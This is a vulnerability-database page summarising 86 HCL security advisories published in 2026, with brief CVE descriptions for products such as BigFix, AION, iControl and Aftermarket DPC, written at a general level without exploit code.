Hcl

By the Year

In 2026 there have been 86 vulnerabilities in Hcl with an average score of 4.2 out of ten. Last year, in 2025 Hcl had 39 security vulnerabilities published. That is, 47 more vulnerabilities have already been reported in 2026 as compared to last year. Last year, the average CVE base score was greater by 0.93

Recent Hcl Security Vulnerabilities

CVE	Date	Vulnerability	Products
CVE-2025-62338	Jun 04, 2026	HCL BigFix Cloud LC Mgt: Input Validation Flaw Enables Info Exposure The HCL BigFix Cloud Lifecycle Management is affected by Lack Of Input Validation. It may leads to an information exposure vulnerability. This low-level flaw allows unauthorized access.	Bigfix
CVE-2025-59874	Jun 04, 2026	CSP Directive Missing in HCL Hive Telco Obs Keycloak Web App HCL Hive Telco Observability is affected by  a Required directives missing from the CSP issue is detected in keycloak component of the web application. Missing essential directives can leave a site vulnerable.
CVE-2025-52606	Jun 04, 2026	HCL iControl Weak Input Validation (WIV) Vulnerability HCL iControl was affected by Weak Input Validation vulnerability. This weakness is caused during implementation of an architectural security tactic. Received input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.
CVE-2025-52608	Jun 04, 2026	HCL iControl Missing Cookie Attributes (Secure, SameSite) HCL iControl was affected by Missing Cookie Attributes vulnerability. It was observed that the application is missing several critical cookie attributes, including Secure and SameSite. And also path is set to root.
CVE-2025-52609	Jun 04, 2026	HCL iControl XSS via Missing Security Headers HCL iControl was affected by Missing Security Headers vulnerability. which lead to cross-site scripting (XSS) attacks by enabling the built-in XSS filtering mechanisms of modern web browsers.
CVE-2025-52611	Jun 04, 2026	HCL iControl v4.0.0 stack trace disclosure via undefined JS property HCL iControl v4.0.0 was affected by Unhandled Exception - Stack Trace Disclosure vulnerability. The error occurs due to an undefined property being accessed in the application's JavaScript code. Specifically, the code attempts to read the property dashboard key from an object that is undefined. This issue likely stems from one of the following: A missing or improperly initialized object.
CVE-2025-52612	Jun 04, 2026	Reflected XSS via CSV Export in HCL iControl HCL iControl was affected by Export CSV - CSV Injection vulnerability. It is vulnerable to a reflected cross-site scripting vulnerability. This was caused by an insufficient sanitation of input parameters. .
CVE-2024-42206	Jun 02, 2026	CVE-2024-42206: HCL iReflection Web App Uses Outdated Vulnerable Components HCL iReflection Third party vulnerable and outdated components issue was detected in the web application
CVE-2025-31985	May 20, 2026	HCL BigFix SM X-Content-Type-Options Header Misconfig - Browser MIME Sniffing HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure X-Content-Type-Options header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly.	Bigfix
CVE-2025-31973	May 20, 2026	Insecure Base Image Use in HCL BigFix Service Management HCL BigFix Service Management (SM) is susceptible to a Configuration 'Insecure Use of Base Image Version'. Using outdated or insecure base images may introduce known vulnerabilities, potentially increasing the risk of exploitation in the application environment.	Bigfix
CVE-2025-62305	May 14, 2026	OOB Disclosure in HCL AION (CVE-2025-62305) HCL AION is affected by a vulnerability where certain operations may trigger out-of-band interactions, potentially resulting in unintended disclosure of sensitive information. Such behaviour may allow exposure of data to external systems under specific conditions.	Aion
CVE-2025-62317	May 14, 2026	HCL AION Sensitive Data in URL Parameters Disclosure HCL AION is affected by a vulnerability where sensitive information may be included in URL parameters. Passing sensitive data in URLs may expose it through browser history, logs, or intermediary systems, potentially leading to unintended information disclosure under certain conditions.	Aion
CVE-2025-62308	May 14, 2026	Sensitive Backend Info Disclosure in HCL AION HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions	Aion
CVE-2025-62309	May 14, 2026	HCL AION Autocomplete Info Disclosure via Browser Caching HCL AION is affected by a vulnerability where auto-complete functionality is enabled for certain input fields. This may allow sensitive information to be stored in the browser, potentially leading to unintended exposure under specific conditions.	Aion
CVE-2025-62312	May 14, 2026	HCL AION Basic Auth Token Leak Vulnerability HCL AION is affected by a vulnerability where basic authorization tokens are used for authentication. Use of basic authorization mechanisms may expose credentials to potential interception or misuse, especially if not combined with secure transmission practices.	Aion
CVE-2025-62316	May 14, 2026	HCL AION HTTP Response Header Misconfig Weakens Browser Security HCL AION is affected by a vulnerability where certain security-related HTTP response headers are not properly configured. Absence of these headers may reduce the effectiveness of browser-based security controls and could expose the application to limited security risks under specific conditions.	Aion
CVE-2025-62313	May 14, 2026	HCL AION Brute-Force Access via Missing Auth Throttle HCL AION is affected by a vulnerability where adequate protections against brute-force attempts are not enforced. This may allow repeated authentication attempts, potentially leading to unauthorized access or account compromise under certain conditions.	Aion
CVE-2025-62311	May 14, 2026	HCL AION Backend Service Data Exposure via Insecure HTTP HCL AION is affected by a vulnerability where backend service details may be transmitted over insecure HTTP channels. This may expose sensitive information to potential interception or unauthorized access during transmission under certain conditions	Aion
CVE-2025-62310	May 14, 2026	Unencrypted Data Exposure in HCL AION Encryption Not Enforced HCL AION is affected by a vulnerability where encryption is not enforced for certain data transmissions or operations. This may expose sensitive information to potential interception or unauthorized access under specific conditions.	Aion
CVE-2024-30151	May 06, 2026	Broken Access Control in HCL BigFix SM (SX) Enables Privilege Escalation HCL BigFix Service Management (SX) is affected by a Broken Access Control vulnerability leading to privilege escalation. This could allow unauthorized users to gain elevated privileges, bypassing intended access restrictions. This may result in exposure of sensitive data or unauthorized system modifications	Bigfix
CVE-2025-31960	May 06, 2026	Info Exposure via Unhandled Exception in HCL BigFix SM Reporting HCL BigFix Service Management (SM) is vulnerable to information exposure due to improper error handling within its reporting module. It was observed that supplying an invalid or out-of-range value to the consumer_company parameter during a report-viewing request causes the application to trigger an unhandled exception.	Bigfix
CVE-2025-31974	May 06, 2026	HCL BigFix SM Root FS Read-Only Misconfig allows critical changes HCL BigFix Service Management (SM) is susceptible to a Root File System Not Mounted as Read-Only. An improperly configured root file system may allow unintended modifications to critical system components, potentially increasing the risk of system compromise or unauthorized changes.	Bigfix
CVE-2025-31975	May 06, 2026	HCL BigFix SM InfoDisclosure: Server Banner Leak Reveals Versions HCL BigFix Service Management (SM) is affected by an Information Disclosure Server Banner issue was identified. Exposed server banners may reveal software versions and system details, potentially aiding attackers in targeting known vulnerabilities.	Bigfix
CVE-2025-52613	May 06, 2026	HCL BigFix SM WSGI Server Vulnerability Enables Unauthorized Access HCL BigFix Service Management (SM) is affected by use of a vulnerable WSGI Server was identified. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access.	Bigfix
CVE-2025-31976	May 06, 2026	Insufficiently Protected Credentials in HCL BigFix SM HCL BigFix Service Management (SM) is vulnerable to insufficiently protected credentials for a short duration while communicating with a backend, internal application which could allow an attacker to potentially misuse them, if exfiltrated. .	Bigfix
CVE-2025-31978	May 06, 2026	HCL BigFix SM CSV/XLS/XLSX Sanitization Bypass (CVE-2025-31978) HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.	Bigfix
CVE-2025-31959	May 06, 2026	HCL BigFix SM Exif Metadata Exposure Vulnerability HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared. .	Bigfix
CVE-2025-31982	May 06, 2026	Unlinked Directory Access Enables Information Disclosure in HCL BigFix SM HCL BigFix Service Management (SM) had directories that were not linked or publicly visible but could be accessed directly. This could allow an increased risk of information disclosure or misuse of sensitive functionality.	Bigfix
CVE-2025-31984	May 06, 2026	BigFix SM MIME-Type Sniffing via Missing X-Content-Type-Options Header HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure X-Content-Type-Options header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly.	Bigfix
CVE-2025-31983	May 06, 2026	HCL BigFix SM CSP Header XSS Vulnerability HCL BigFix Service Management (SM) is affected by a security misconfiguration vulnerability due to CSP header. This could allow attackers to inject malicious scripts increasing the risk of cross-site scripting (XSS) and potential exposure of sensitive information.	Bigfix
CVE-2025-31957	May 06, 2026	HCL BigFix SM CSRF Enables Unauthorized Changes HHCL BigFix Service Management (SM) is affected by a CrossSite Request Forgery (CSRF) vulnerability. This could lead to unauthorized changes or exposure of sensitive data.	Bigfix
CVE-2025-62345	May 06, 2026	HCL BigFix RunBookAI Input Handling Vulnerability (CVE-2025-62345) HCL BigFix RunBookAI is affected by a Continued availability of Less-Secure Input Text Vulnerability . A component contains a security weakness in its input handling implementation, increasing the risk of misconfiguration and operational errors.	Bigfix
CVE-2025-31951	May 06, 2026	HCL BigFix RunBookAI Command Smuggling via Unvalidated Input HCL BigFix RunBookAI is affected by a Unvalidated Command Input / Potential Command Smuggling vulnerability. A flaw in a component's input handling was identified that could permit unauthorized command execution.	Bigfix
CVE-2025-59854	May 06, 2026	HCL DFXAnalytics: Vulnerable X-XSS-Protection Header (CSP Bypass) HCL DFXAnalytics is affected by an Insecure Security Header Configuration vulnerability where the application utilizes the outdated X-XSS-Protection header, which could allow an attacker to exploit browser-specific rendering flaws or bypass security controls that should instead be managed by a robust Content Security Policy (CSP).
CVE-2025-59853	May 06, 2026	HCL DFXAnalytics Improper Error Handling Exposes Detailed Stack Traces HCL DFXAnalytics is affected by an Improper Error Handling vulnerability where the application exposes detailed stack traces in responses, which could allow an attacker to gain insights into the application's internal structure, code logic, and environment configurations.
CVE-2025-59852	May 06, 2026	HCL DFXAnalytics Insufficient TLS Protection - Unencrypted Data Transmission HCL DFXAnalytics is affected by an Insufficient Transport Layer Protection vulnerability where data is transmitted over the network without encryption, which could allow an attacker to compromise the confidentiality, integrity, and authentication of sensitive information.
CVE-2025-59851	May 06, 2026	HCL DFXAnalytics Vulnerable to Using Components with Known Vulnerabilities HCL DFXAnalytics is affected by a Using Components with Known Vulnerabilities flaw where the application utilizes unpatched libraries or sub-components, which could allow an attacker to identify and exploit publicly known security vulnerabilities to gain unauthorized access or compromise the application.
CVE-2025-31970	May 06, 2026	HCL DFXAnalytics CSP Header Misconfiguration Allowing XSS HCL DFXAnalytics is affected by an Insecure Security Header configuration vulnerability where the Content-Security-Policy does not define strict directives for object-src and base-uri, which could allow an attacker to exploit injection vectors such as Cross-Site Scripting (XSS)
CVE-2025-52641	Apr 15, 2026	HCL AION Filesystem Structure Disclosure via System Behaviour HCL AION is affected by a vulnerability where certain system behaviours may allow exploration of internal filesystem structures. Exposure of such information may provide insights into the underlying environment, which could potentially aid in further targeted actions or limited information disclosure.	Aion
CVE-2025-55261	Mar 26, 2026	Missing Functional Level Access Control in HCL Aftermarket DPC HCL Aftermarket DPC is affected by Missing Functional Level Access Control which will allow attacker to escalate his privileges and may compromise the application and may steal and manipulate the data.
CVE-2025-55262	Mar 26, 2026	SQLi in HCL Aftermarket DPC Enables Data Retrieval HCL Aftermarket DPC is affected by SQL Injection which allows attacker to exploit this vulnerability to retrieve sensitive information from the database.
CVE-2025-55263	Mar 26, 2026	HCL Aftermarket DPC Hardcoded Sensitive Data Exposes Secrets HCL Aftermarket DPC is affected by Hardcoded Sensitive Data which allows attacker to gain access to the source code or if it is stored in insecure repositories, they can easily retrieve these hardcoded secrets.
CVE-2025-55264	Mar 26, 2026	Session Hijack: HCL Aftermarket DPC Persists After Password Reset HCL Aftermarket DPC is affected by Failure to Invalidate Session on Password Change will allow attacker to access to a session, then they can maintain control over the account despite the password change leading to account takeover.
CVE-2025-55265	Mar 26, 2026	HCL Aftermarket DPC: File Discovery Enables Sensitive File Read HCL Aftermarket DPC is affected by File Discovery which allows attacker could exploit this issue to read sensitive files present in the system and may use it to craft further attacks.
CVE-2025-55266	Mar 26, 2026	HCL Aftermarket DPC Session Fixation Vulnerability HCL Aftermarket DPC is affected by Session Fixation which allows attacker to takeover the user's session and use it carry out unauthorized transaction behalf of the user.
CVE-2025-55267	Mar 26, 2026	HCL Aftermarket DPC Unrestricted File Upload CVE-2025-55267 HCL Aftermarket DPC is affected by Unrestricted File Upload vulnerability, allows attacker to upload and execute malicious scripts, gaining full control over the server.
CVE-2025-55268	Mar 26, 2026	DOS via Spamming in HCL Aftermarket DPC HCL Aftermarket DPC is affected by Spamming Vulnerability which can allow the actor to excessive spamming can consume server bandwidth and processing resources which may lead to Denial of Service.
CVE-2025-55269	Mar 26, 2026	HCL Aftermarket DPC Vulnerable to Weak Password Policy HCL Aftermarket DPC is affected by Weak Password Policy vulnerability, which makes it easier for attackers to guess weak passwords or use brute-force techniques to gain unauthorized access to user accounts.
CVE-2025-55270	Mar 26, 2026	HCL Aftermarket DPC Improper Input: XSS/SQL/Command Injection HCL Aftermarket DPC is affected by Improper Input Validation which allows an attacker to inject executable code and can carry out attacks such as XSS, SQL Injection, Command Injection etc.
CVE-2025-55271	Mar 26, 2026	HCL Aftermarket DPC HTTP Response Splitting for Remote Code Exec HCL Aftermarket DPC is affected by HTTP Response Splitting vulnerability where in depending on how the web application handles the split response, an attacker may be able to execute arbitrary commands or inject harmful content into the response..